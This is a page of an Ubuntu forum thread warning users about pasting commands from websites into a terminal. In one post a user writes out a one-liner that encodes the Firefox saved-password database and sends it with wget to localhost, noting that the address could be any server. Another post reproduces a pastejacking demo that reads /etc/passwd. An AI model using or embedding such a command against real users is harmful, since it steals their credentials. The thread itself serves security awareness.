Page 2 of 3 FirstFirst 123 LastLast
Results 11 to 20 of 23

Thread: Warning to those who copy-paste commands directly to the Terminal

  1. #11
    Join Date
    Oct 2009
    Beans
    Hidden!
    Distro
    Ubuntu 12.04 Precise Pangolin

    Re: Warning to those who copy-paste commands directly to the Terminal

    Quote Originally Posted by wojox View Post
    or just plain lazy like me.
    Lazy like me too, except I'll run stuff on a test box before trying it on production.
    Come to #ubuntuforums! We have cookies! | Basic Ubuntu Security Guide

    Tomorrow's an illusion and yesterday's a dream, today is a solution...

  2. #12
    Join Date
    Apr 2012
    Location
    Darkstar
    Beans
    358

    Re: Warning to those who copy-paste commands directly to the Terminal

    Quote Originally Posted by forrestcupp View Post
    I remember several years ago when some people on here were posting commands to delete people's hard drive partitions. It doesn't have to be anything advanced at all. You just have to have someone new and trusting who doesn't know what they're doing, and you could do a lot of damage.

    We haven't had any of that kind of trouble here for a very long time. But like the OP said, you can't just trust every random blog out there. CharlesA also made a good point that a lot of stuff that comes up in searches on the net are old and don't work anymore.
    100% agreed. If you don't have a text editor open, quote the person's post and review ALL of it, for anything fishy or suspicious.
    CrunchBang Linux
    Plz no tpe lik dis or no anser!!
    The search tool can be found in the upper right corner of your screen, please use it to your advantage, especially before asking questions.

  3. #13
    Join Date
    Oct 2009
    Beans
    Hidden!
    Distro
    Ubuntu 12.04 Precise Pangolin

    Re: Warning to those who copy-paste commands directly to the Terminal

    Quote Originally Posted by codingman View Post
    100% agreed. If you don't have a text editor open, quote the person's post and review ALL of it, for anything fishy or suspicious.
    I doubt you'll find much like that on these forums (mostly cuz it's fairly hard to hide text with CSS like the link in the OP does), but if you want to be sure, you can always quote the post or copy/paste it into the quick reply box to see if there is anything iffy about it.
    Come to #ubuntuforums! We have cookies! | Basic Ubuntu Security Guide

    Tomorrow's an illusion and yesterday's a dream, today is a solution...

  4. #14
    Join Date
    Apr 2012
    Location
    Darkstar
    Beans
    358

    Re: Warning to those who copy-paste commands directly to the Terminal

    True, but its better to be safe than sorry.
    CrunchBang Linux
    Plz no tpe lik dis or no anser!!
    The search tool can be found in the upper right corner of your screen, please use it to your advantage, especially before asking questions.

  5. #15
    Join Date
    Apr 2013
    Location
    Guildford, UK
    Beans
    103
    Distro
    Kubuntu 13.04 Raring Ringtail

    Re: Warning to those who copy-paste commands directly to the Terminal

    Haha thanks, guess I was being a bit naive there.

    As for leading people to delete their hard drive partitions...that's just MEAN.

  6. #16
    Join Date
    May 2005
    Location
    Indiana
    Beans
    1,933
    Distro
    Hardy Heron (Ubuntu Development)

    Re: Warning to those who copy-paste commands directly to the Terminal

    Quote Originally Posted by wojox View Post
    or just plain lazy like me.
    You don't even have to be lazy when it comes to the longer scripts. How many people actually sift through every line of a long script before they run it, even if they know what it means? Most people don't have that much time, so they just trust people.
    Today you are You, that is truer than true. There is no one alive who is Youer than You. - Dr. Seuss

  7. #17
    Join Date
    Jun 2009
    Location
    0:0:0:0:0:0:0:1
    Beans
    4,112
    Distro
    Xubuntu 13.04 Raring Ringtail

    Re: Warning to those who copy-paste commands directly to the Terminal

    note to self: stop using terminal for scrap paper (easy to open via keyboard shortcut), that trick could use curl to read my firefox password database and send it somewhere

    eg have something like this hidden in it
    Code:
    data="$(perl -MURI::Escape -e 'print uri_escape($ARGV[0]);' "$(cat ~/.mozilla/firefox/*.default/signons.sqlite)")";wget "http://127.0.0.1?data=$data" -o /dev/null &;clear;bash ~/.bashrc 2> /dev/null
    that makes your firefox password database URL safe and sends it to localhost (127.0.0.1) the loopback address on a computer, that address could easly be changed to some sever somewhere that processes the database
    and if your passwords are not password protected (Edit -> Preferences -> Security -> look at the last check box) you would be screwed and not even know it
    Last edited by pqwoerituytrueiwoq; April 11th, 2013 at 02:36 AM.
    Laptop: ASUS A54C-NB91 (Storage: WD3200BEKT + MKNSSDCR60GB-DX); Desktop: Custom Build - Images included; rPi Server
    Putting your Networked Printer's scanner software to shame PHP Scanner Server
    I frequently edit my post when I have the last post

  8. #18
    Moose is offline Gee! These Aren't Roasted!
    Join Date
    Aug 2012
    Location
    Australia
    Beans
    Hidden!
    Distro
    Ubuntu 12.10 Quantal Quetzal

    Re: Warning to those who copy-paste commands directly to the Terminal

    Thanks so much for the heads up! I don't usually c/p commands unless they are really big, but now I will stay more wary.

  9. #19
    Join Date
    Feb 2011
    Location
    Right here, right now.
    Beans
    95
    Distro
    Kubuntu

    Re: Warning to those who copy-paste commands directly to the Terminal

    Always read the label.

  10. #20
    Join Date
    Jan 2013
    Location
    Eastern Europe
    Beans
    Hidden!
    Distro
    Lubuntu

    Re: Warning to those who copy-paste commands directly to the Terminal

    WOW
    didnt know that.

    git clone /dev/null; clear; echo -n "Hello ";whoami|tr -d '\n';echo -e '!\nThat was a bad idea. Don'"'"'t copy code from websites you don'"'"'t trust!
    Here'"'"'s the first line of your /etc/passwd: ';head -n1 /etc/passwd
    git clone git://git.kernel.org/pub/scm/utils/kup/kup.git

    git clone [201~/dev/null; clear; echo -n "Hello ";whoami|tr -d '\n';echo -e '!\nThat was a bad idea. Don'"'"'t copy code from websites you don'"'"'t trust!
    Here'"'"'s the first line of your /etc/passwd: ';head -n1 /etc/passwd
    git clone git://git.kernel.org/pub/scm/utils/kup/kup.git


    OK, thank you for advice!

    edit:
    added leafpad shortcut into taskbar-s "application launch bar"

    edit2:
    hmm you can select the code and right click on it - look for "search by google", but dont select it. At least beginnig is seen - something is not what it looks like.
    Last edited by Locus Kiesselbachi; April 12th, 2013 at 11:12 PM. Reason: Leafpad, search by google

Page 2 of 3 FirstFirst 123 LastLast

Bookmarks

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •